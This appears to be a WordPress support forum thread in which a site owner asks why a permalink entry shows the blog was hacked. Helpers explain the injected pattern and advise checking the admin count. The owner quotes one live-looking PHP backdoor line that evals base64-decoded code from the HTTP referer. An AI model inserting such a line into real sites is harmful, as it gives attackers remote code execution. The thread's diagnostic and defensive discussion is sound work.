I thought if I was hacked my site wouldn’t be there, or would redirect to a porn site, or be full of adverts for performance-enhancing drugs.
What is this telling you to make you think it’s been hacked:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Trying to learn this stuff so thanks for the feedback. 🙂
because that is a typical hack – it probably worked silently until you maybe upgraded, changed permalinks or some plugin that works with permalinks or something server-side changed
if you have ads, it could be the company providing them
I’m no expert, but I think the basic idea with this sort of hack is that your server will execute whatever code is passed to it through the browser referrer string.
Normally this referrer would be the webpage the visitor came from to get to your site, but the hacker could manipulate this and change the referrer string to be malicious code and your server will execute it without question – ie the hacker can add spam links, steal passwords, add files, add hidden administrators so they can come back even when you’ve seemingly fixed the problem, etc. It does also change all your URLs which lead to 404s/server errors, so it’s not exactly subtle stuff.
I seem to remember this vulnerability was fixed back around 2.8.x ish, so there’s a good chance you’ve been hacked for a while. Check the total number of admins is correct… and follow the links above.
Ya, we haven’t logged into this blog for a couple of months as we’re deciding what direction to take with the main site.
I did just delete a couple of “admins” who had added themselves. How do we keep this from happening? I don’t see anything in the General Settings to address this.
Thanks all!!